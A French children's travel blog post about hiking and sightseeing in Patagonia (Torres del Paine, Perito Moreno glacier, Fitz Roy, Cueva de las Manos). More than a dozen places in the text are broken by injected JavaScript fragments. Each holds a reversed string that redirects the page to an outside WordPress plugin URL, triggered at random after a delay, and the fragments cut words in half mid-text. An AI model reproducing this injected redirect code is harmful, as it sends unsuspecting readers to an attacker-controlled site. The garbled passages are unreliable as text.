Tellement beau la Patagonie !!!

by Alice

Vendredi 31 Janvier

Aujourd’hui nous avons fait 2 petites randonnées. Une de deux heures et une de 1H pour nous préparer à celle de demain qui fera plus de 20km. Il faudra se lever à 5h du matin.

Dans la première ballade on a vu des Icebergs !! C’est tellement beau qu’on dirait que c’est faux !!!

Mardi 4 février

C’est super compliqué de se lever à 5H du mat !!!! Mais ça vaut le coup, cette longue randonnée était assez tranquille pendant 3H puis pendant plus d’une heure c’est une grande montée raide dans les rochers. Mais quand tu vois le lac bleu glacier avec les Torres del Paine enneigées en fond, tu te dis que tu n’as pas fait ça pour rien !! Après avoir mangé devant ce magnifique paysage il faut malheureusement redescendre. En toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout j’ai marché plus de 9h et j’ai fait plus de 22km et 1000m de dénivelé.

Deux jours plus tard nous sommes allés à El Calafate. Cette ville est très connue pour son sublime glacier : Le Peritoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Moreno. Ce glacier fait 30km de long, 5km de largeur et 70m de hauteur. Des petits morceaux toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombent souvent et si vous avez de la chance vous pouvez voir d’énormes bouts de glace toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomber. Le soir nous avons vu du rodéo sur cheval. Ils attachent les chevaux très court à des poteaux, leur bandent les yeux pour les énerver puis les cavaliers doivent rester dessus jusqu’à ce que la cloche retentisse. Le lendemain nous sommes allés au Glaciarium, un musée qui explique toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout sur les glaciers.

Aujourd’hui, nous sommes arrivés à El Chalten et nous nous préparons à une nouvelle randonnée et il faudra encore se lever tôt.  

Jeudi 13 février 17h

Le mercredi 5 février nous nous sommes encore levés tôt pour aller voir le Fitz Roy. Nous avons fait une belle randonnée et quand nous sommes arrivés au sommet nous avons vu un beau paysage avec un beau lac et un glacier en fond et bien sûr le Fitz Roy.

Le sur-lendemain nous avons fait encore une rando géniale !! Arrivés au bord du lac il y avait une centaine d’Icebergs de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes tailles et un magnifique glacier en fond. Avec Clément nous avons joué à pêcher des icebergs. Nous avons cru voir  à un moment donné un petit iceberg mais nous avions oublié que nous ne voyons que 10% et que 90% se cachent dans l’eau. Alors Papa est venu nous aider et a ramené au bord de l’eau l’iceberg. Après, Clément et moi nous nous sommes rappelés d’un “C’est pas sorcier” sur les glaciers avec des tailleurs de glace alors nous avons eu l’idée de fait la tête d’Olaf et nous l’avons nommé “Super Olaf”!

Le lendemain matin j’ai eu l’idée de vendre des bracelets que j’avais faits, alors j’ai pris toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les bracelets et je les ai vendus 50$ l’un. Dimanche nous avons pris une piste pour aller voir la Cueva de las Manos, c’est des dessins de mains faits à l’époque de la préhistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire. La piste était très longue alors  on a dormi au bord de la piste avec une bonne dizaine de squelettes de moutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons et de guanacos autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour de nous. Beurrk !!!

Le lendemain nous avons donc vu la Cueva de las Manos ,et une main avait 6 doigts!!! Il y avait aussi des scènes de chasse.  

Aujourd’hui nous avons rencontré Walter et sa famille qui habitent dans une chacra (verger) de cerisiers, ils ont aussi un magasin de location de kayaks et de matériel de pêche. Le matin nous avons joué avec leur fils Fantino qui nous a fait visiter sa chacra. C’était un peu compliqué de communiquer mais nous avons compris qu’il y avait un rio pas loin et que après manger nous pourrions y aller avec sa maman Paola. Avant d’aller au rio nous avons récupéré une amie de Fantino et elle s’est baignée toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute habillée dans l’eau !!! Pour moi l’eau était trop froide…

Le soir, nous sommes repartis avec toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le monde (sauf nos parents) pour aller à leur magasin. Je me suis trop amusée car dans l’arrière magasin il y avait un petit jardin avec un trampoline. C’était trop drôle de rentrer dans l’arrière boutique quand il y avait des clients pour regarder dans les caméras.